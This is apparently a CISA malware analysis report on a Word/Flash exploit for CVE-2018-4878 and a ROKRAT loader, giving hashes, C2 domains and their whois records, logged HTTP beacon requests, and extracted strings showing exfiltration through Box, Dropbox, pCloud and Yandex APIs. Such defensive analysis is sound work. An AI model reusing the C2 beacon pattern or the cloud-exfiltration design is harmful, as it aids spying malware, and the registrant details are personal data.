MAR-10160323-1.v2

This report is provided "as is" for informational purposes only. The Department of Homeland Security (DHS) does not provide any warranties of any kind regarding any information contained herein. The DHS does not endorse any commercial product or service referenced in this bulletin or otherwise.

This document is marked TLP:WHITE--Disclosure is not limited. Sources may use TLP:WHITE when information carries minimal or no foreseeable risk of misuse, in accordance with applicable rules and procedures for public release. Subject to standard copyright rules, TLP:WHITE information may be distributed without restriction. For more information on the Traffic Light Protocol (TLP), see http://www.us-cert.gov/tlp.

Description

The CISA Code & Media Analysis team received three artifacts for analysis. The first artifact is a malicious Microsoft Word document that contains an embedded Shockwave Flash (SWF) application file. This embedded SWF file attempts to exploit the vulnerability detailed within CVE-2018-4878. The second artifact executes an embedded resource named “JOK” and injects it into the Windows application “Wscript.exe.” This embedded resource contains an encoded variant of the malware known as ROKRAT. The third artifact in this report is the embedded ROKRAT variant, which was extracted from the loader during analysis.

For a downloadable copy of IOCs, see MAR-10160323-1.v2.stix.

Submitted Files (5)

3b1395f620e428c5f68c6497a2338da0c4f749feb64e8f12e4c5b1288cc57a1c (3f98c434d7b39de61a8b459180dd46...)

851b7b044cbcaa67350aff80a5b9fb4c63393957f3d4b30005a83348fe69ac5a (aa525af1589156fc09f78e69b3b034...)

e1546323dc746ed2f7a5c973dcecc79b014b68bdd8a6230239283b4f775f4bbd (d2881e56e66aeaebef7efaa60a58ef...)

e200517ab9482e787a59e60accc8552bd0c844687cd0cf8ec4238ed2fc2fa573 (5c6c1ed910e7c9740a0289a6d27890...)

fec71b8479f3a416fa58580ae76a8c731c2294c24663c601a1267e0e5c2678a0 (111d205422fe90848c2f41cc84ebd9...)

Domains (2)

www.1588-2040.co.kr

www.korea-tax.info

3b1395f620e428c5f68c6497a2338da0c4f749feb64e8f12e4c5b1288cc57a1c

Tags

CVE-2018-4878trojan

Details

Antivirus

YARA Rules

No matches found.

ssdeep Matches

Relationships

Description

This file is a malicious Microsoft Word document. This document contains an embedded malicious ShockWave Flash (SWF) file (851b7b04cc) designed to exploit the vulnerability detailed within CVE-2018-4878.

851b7b044cbcaa67350aff80a5b9fb4c63393957f3d4b30005a83348fe69ac5a

Tags

CVE-2018-4878trojan

Details

Antivirus

YARA Rules

No matches found.

ssdeep Matches

Relationships

Description

This file is the malicious ShockWave Flash (SWF) file embedded in the Microsoft Word document 3b1395f620e428c5f68c6497a2338da0c4f749feb64e8f12e4c5b1288cc57a1c. When the malware is executed, it attempts to connect to the hard-coded Command and Control (C2) server "www.korea-tax.info."

www.korea-tax.info

Tags

command-and-control

URLs

• www.korea-tax.info/crossdomain.xml
• www.korea-tax.info/main/local.php?id=8B4D963B41003E407AC0022E40FCE01C1DA94EB8DEEF20939722ABBFE7F52B9C7DEA62EFDB0D82345AE24D366F9C7BDC2C8F5C460AE8BE18E59C1116489EC9F2EB5504617A4D6D74982D602624E94F32BB3864277E4967BD15B1E36AF4A98431DC76C4BB&fp_vs=WIN%2018.0,0,209&os_vs=Windows%207

Ports

• 80 TCP

HTTP Sessions

• GET /crossdomain.xml HTTP/1.1
  
  Host: www.korea-tax.info
  
  Connection: keep-alive
  
  User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36
  
  Accept: */*
  
  Accept-Encoding: gzip,deflate,sdch
  
  Accept-Language: en-US,en;q=0.8
• GET /main/local.php?id=8B4D963B41003E407AC0022E40FCE01C1DA94EB8DEEF20939722ABBFE7F52B9C7DEA62EFDB0D82345AE24D366F9C7BDC2C8F5C460AE8BE18E59C1116489EC9F2EB5504617A4D6D74982D602624E94F32BB3864277E4967BD15B1E36AF4A98431DC76C4BB&fp_vs=WIN%2018.0,0,209&os_vs=Windows%207 HTTP/1.1
  
  Host: www.korea-tax.info
  
  Connection: keep-alive
  
  User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36
  
  Accept: */*
  
  Accept-Encoding: gzip,deflate,sdch
  
  Accept-Language: en-US,en;q=0.8

Whois

Queried whois.afilias.info with "korea-tax.info"...



Domain Name: KOREA-TAX.INFO

Registry Domain ID: D503300000055962553-LRMS

Registrar WHOIS Server:

Registrar URL: http://www.PublicDomainRegistry.com

Updated Date: 2018-02-10T20:31:57Z

Creation Date: 2017-12-12T05:52:58Z

Registry Expiry Date: 2018-12-12T05:52:58Z

Registrar Registration Expiration Date:

Registrar: PDR Ltd. d/b/a PublicDomainRegistry.com

Registrar IANA ID: 303

Registrar Abuse Contact Email: abuse-contact@publicdomainregistry.com

Registrar Abuse Contact Phone: +1.2013775952

Reseller:

Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited

Registry Registrant ID: C213778924-LRMS

Registrant Name: yang jieun

Registrant Organization: yang jieun

Registrant Street: 25-11 Wongwangmyeongan-ro Gwangmyeong-si Gyeonggi-do

Registrant City: Kwangmyong

Registrant State/Province: Kyonggi-do

Registrant Postal Code: 14200

Registrant Country: KR

Registrant Phone: +82.1044612320

Registrant Phone Ext:

Registrant Fax:

Registrant Fax Ext:

Registrant Email: john.chapman91128@gmail.com

Registry Admin ID: C213778924-LRMS

Admin Name: yang jieun

Admin Organization: yang jieun

Admin Street: 25-11 Wongwangmyeongan-ro Gwangmyeong-si Gyeonggi-do

Admin City: Kwangmyong

Admin State/Province: Kyonggi-do

Admin Postal Code: 14200

Admin Country: KR

Admin Phone: +82.1044612320

Admin Phone Ext:

Admin Fax:

Admin Fax Ext:

Admin Email: john.chapman91128@gmail.com

Registry Tech ID: C213778924-LRMS

Tech Name: yang jieun

Tech Organization: yang jieun

Tech Street: 25-11 Wongwangmyeongan-ro Gwangmyeong-si Gyeonggi-do

Tech City: Kwangmyong

Tech State/Province: Kyonggi-do

Tech Postal Code: 14200

Tech Country: KR

Tech Phone: +82.1044612320

Tech Phone Ext:

Tech Fax:

Tech Fax Ext:

Tech Email: john.chapman91128@gmail.com

Registry Billing ID: C213778924-LRMS

Billing Name: yang jieun

Billing Organization: yang jieun

Billing Street: 25-11 Wongwangmyeongan-ro Gwangmyeong-si Gyeonggi-do

Billing City: Kwangmyong

Billing State/Province: Kyonggi-do

Billing Postal Code: 14200

Billing Country: KR

Billing Phone: +82.1044612320

Billing Phone Ext:

Billing Fax:

Billing Fax Ext:

Billing Email: john.chapman91128@gmail.com

Name Server: NS3.HOSTINGER.COM

Name Server: NS4.HOSTINGER.COM

Name Server: NS1.HOSTINGER.COM

Name Server: NS2.HOSTINGER.COM

DNSSEC: unsigned

URL of the ICANN Whois Inaccuracy Complaint Form: https://www.icann.org/wicf/

Relationships

Description

Identified malicious C2 Server.

fec71b8479f3a416fa58580ae76a8c731c2294c24663c601a1267e0e5c2678a0

Tags

CVE-2018-4878trojan

Details

Antivirus

YARA Rules

No matches found.

ssdeep Matches

Relationships

Description

This file is a malicious ShockWave Flash (SWF) file designed to exploit the vulnerability detailed within CVE-2018-4878. When executed, the malware attempts to connect to the hard-coded command-and-control (C2) server "www.1588-2040.co.kr."

www.1588-2040.co.kr

Tags

command-and-control

URLs

• www.1588-2040.co.kr/crossdomain.xml
• www.1588-2040.co.kr/design/m/images/image/image.php?id=2E4B4EE62772DB77094E0210546BEEBF2F669A2309009324807100E182FFDFEAB2CE91B00DFA993ACDE3A1198DC8BD9DAF98F449FB04FD8588D94693E08D3BC45F17C4ECDC040F138CC8916D2252478D3BE342D5FA1F6231EF6562053E5C1463FDCEEE82&fp_vs=WIN%2018.0,0,209&os_vs=Windows%207

Ports

• 80 TCP

HTTP Sessions

• GET /crossdomain.xml HTTP/1.1
  
  Host: www.1588-2040.co.kr
  
  Connection: keep-alive
  
  User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36
  
  Accept: */*
  
  Accept-Encoding: gzip,deflate,sdch
  
  Accept-Language: en-US,en;q=0.8
• GET /design/m/images/image/image.php?id=2E4B4EE62772DB77094E0210546BEEBF2F669A2309009324807100E182FFDFEAB2CE91B00DFA993ACDE3A1198DC8BD9DAF98F449FB04FD8588D94693E08D3BC45F17C4ECDC040F138CC8916D2252478D3BE342D5FA1F6231EF6562053E5C1463FDCEEE82&fp_vs=WIN%2018.0,0,209&os_vs=Windows%207 HTTP/1.1
  
  Host: www.1588-2040.co.kr
  
  Connection: keep-alive
  
  User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36
  
  Accept: */*
  
  Accept-Encoding: gzip,deflate,sdch
  
  Accept-Language: en-US,en;q=0.8

Whois

Domain Name                 : 1588-2040.co.kr

Registrant                 : S.S. Moon

Registrant Address         : 1303 manhatan b/d 36-2, Yeoeuido-dong Yeongdeungpo-gu Seoul Korea

Registrant Zip Code         : 150749

Administrative Contact(AC) : S.S. Moon

AC E-Mail                 : card15882040@nate.com

AC Phone Number             : 02-2090-3500

Registered Date             : 2009. 07. 03.

Last Updated Date         : 2015. 07. 03.

Expiration Date             : 2018. 07. 03.

Publishes                 : Y

Authorized Agency         : Asadal, Inc.(http://www.asadal.co.kr)

DNSSEC                     : unsigned



Primary Name Server

Host Name                : ns.epart.com



Secondary Name Server

Host Name                : ns1.epart.com

Relationships

Description

Identified malicious C2 domain.

e1546323dc746ed2f7a5c973dcecc79b014b68bdd8a6230239283b4f775f4bbd

Tags

backdoordroppertrojan

Details

Antivirus

YARA Rules

No matches found.

ssdeep Matches

No matches found.

Packers/Compilers/Cryptors

Relationships

Description

This file is a loader. It is designed to load and execute data contained within an embedded resource named "JOK" into the Windows application "Wscript.exe." The embedded "JOK" resource is approximately 522,848 bytes in size and contains executable code. The beginning portion of the data reveals the presence of a NOP sled (0x90, 0x90, 0x90, ...), which leads to a decoder stub. The decoder code decodes the embedded executable code within the Windows "Wscript.exe" process. The embedded executable code has been identified as ROKRAT (e200517ab9482e787a59e60accc8552bd0c844687cd0cf8ec4238ed2fc2fa573).



 

Screenshots

e200517ab9482e787a59e60accc8552bd0c844687cd0cf8ec4238ed2fc2fa573

Tags

spywaretrojan

Details

Antivirus

YARA Rules

No matches found.

ssdeep Matches

No matches found.

Packers/Compilers/Cryptors

Relationships

Description

This file has been identified as a variant of the malware known as ROKRAT and was obtained by extracting it from the file e1546323dc746ed2f7a5c973dcecc79b014b68bdd8a6230239283b4f775f4bbd.



Displayed below are strings of interest extracted from this variant of ROKRAT.



--Begin Strings of Interest--

Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.116 Safari/537.36

access_token

authorization_code

bearer

client_id

client_secret

code

expires_in

grant_type

redirect_uri

refresh_token

response_type

scope

state

token

token_type

access_token

authorization_code

bearer

client_id

client_secret

code

expires_in

grant_type

redirect_uri

refresh_token

response_type

scope

state

token

token_type

Accept

Accept-Charset

Accept-Encoding

Accept-Language

Accept-Ranges

Age

Allow

Authorization

Cache-Control

Connection

Content-Encoding

Content-Language

Content-Length

Content-Location

Content-MD5

Content-Range

Content-Type

Content-Disposition

Date

ETag

Expect

Expires

From

Host

If-Match

If-Modified-Since

If-None-Match

If-Range

If-Unmodified-Since

Last-Modified

Location

Max-Forwards

Pragma

Proxy-Authenticate

Proxy-Authorization

Range

Referer

Retry-After

Server

Trailer

Transfer-Encoding

Upgrade

User-Agent

Vary

Via

Warning

WWW-Authenticate

Cookie

Set-Cookie

text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8

en-US,en;q=0.8

Bearer

http://127.0.0.1/

https://api.box.com/oauth2/token

https://account.box.com/api/oauth2/authorize

https://api.box.com/2.0/folders/%s/items

GET

entries

etag

name

sequence_id

type

folder

file

POST

201

409

DELETE

204

https://api.box.com/2.0/files/%s/content

200

https://api.box.com/2.0/files/%s

https://api.box.com/2.0/files/%s/trash

https://upload.box.com/api/2.0/files/content

--opxer--

Content-Disposition: form-data; name="attributes"

"}}

", "parent":{"id":"

{"name":"

Content-Disposition: form-data; name="file"; filename="

Content-Type: video/dat

multipart/form-data;boundary=--opxer--

error

sha1

description

created_at

modified_at

size

https://api.box.com/2.0/folders/%s

Error

var request_token = '

max-age=0

<input type="hidden" name="ic" value="

<input type="hidden" name="state" value="

<form action="

box_visitor_id=

bv=

cn=

site_preference=

302

vector<T> too long

invalid string position

string too long

Aapplication/json

path

https://api.dropboxapi.com/2/files/delete

https://content.dropboxapi.com/2/files/upload

application/octet-stream

{"path":"%s","mode":{".tag":"overwrite"}}

{"path":"%s"}

Dropbox-API-Arg

https://content.dropboxapi.com/2/files/download

Ahttps://api.pcloud.com/oauth2_token

https://my.pcloud.com/oauth2/authorize

https://api.pcloud.com/uploadfile?path=%s&filename=%s&nopartial=1

--wwjaughalvncjwiajs--

Content-Type: voice/mp3

multipart/form-data;boundary=--wwjaughalvncjwiajs--

fileids

https://api.pcloud.com/getfilelink?path=%s&forcedownload=1&skipfilename=1

hosts

https://%s%s

https://api.pcloud.com/deletefile?path=%s

true

%s/%s

OAuth

PUT

href

https://cloud-api.yandex.net/v1/disk/resources?path=%s&permanently=%s

false

202

https://cloud-api.yandex.net/v1/disk/resources/upload?path=%s&overwrite=%s

method

https://cloud-api.yandex.net/v1/disk/resources/download?path=%s

--End Strings of Interest--

CISA recommends that users and administrators consider using the following best practices to strengthen the security posture of their organization's systems. Any configuration changes should be reviewed by system owners and administrators prior to implementation to avoid unwanted impacts.

• Maintain up-to-date antivirus signatures and engines.
• Keep operating system patches up-to-date.
• Disable File and Printer sharing services. If these services are required, use strong passwords or Active Directory authentication.
• Restrict users' ability (permissions) to install and run unwanted software applications. Do not add users to the local administrators group unless required.
• Enforce a strong password policy and implement regular password changes.
• Exercise caution when opening e-mail attachments even if the attachment is expected and the sender appears to be known.
• Enable a personal firewall on agency workstations, configured to deny unsolicited connection requests.
• Disable unnecessary services on agency workstations and servers.
• Scan for and remove suspicious e-mail attachments; ensure the scanned attachment is its "true file type" (i.e., the extension matches the file header).
• Monitor users' web browsing habits; restrict access to sites with unfavorable content.
• Exercise caution when using removable media (e.g., USB thumb drives, external drives, CDs, etc.).
• Scan all software downloaded from the Internet prior to executing.
• Maintain situational awareness of the latest threats and implement appropriate Access Control Lists (ACLs).

Additional information on malware incident prevention and handling can be found in National Institute of Standards and Technology (NIST) Special Publication 800-83, "Guide to Malware Incident Prevention & Handling for Desktops and Laptops".

• 1-888-282-0870
• NCCICCustomerService@us-cert.gov (UNCLASS)
• us-cert@dhs.sgov.gov (SIPRNET)
• us-cert@dhs.ic.gov (JWICS)

CISA continuously strives to improve its products and services. You can help by answering a very short series of questions about this product at the following URL: https://us-cert.gov/forms/feedback/

What is a MIFR? A Malware Initial Findings Report (MIFR) is intended to provide organizations with malware analysis in a timely manner. In most instances this report will provide initial indicators for computer and network defense. To request additional analysis, please contact CISA and provide information regarding the level of desired analysis.

What is a MAR? A Malware Analysis Report (MAR) is intended to provide organizations with more detailed malware analysis acquired via manual reverse engineering. To request additional analysis, please contact CISA and provide information regarding the level of desired analysis.

Can I edit this document? This document is not to be edited in any way by recipients. All comments or questions related to this document should be directed to the CISA at 1-888-282-0870 or soc@us-cert.gov.

Can I submit malware to CISA? Malware samples can be submitted via three methods:

• Web: https://malware.us-cert.gov
• E-Mail: submit@malware.us-cert.gov
• FTP: ftp.malware.us-cert.gov (anonymous)

CISA encourages you to report any suspicious activity, including cybersecurity incidents, possible malicious code, software vulnerabilities, and phishing-related scams. Reporting forms can be found on CISA's homepage at www.us-cert.gov.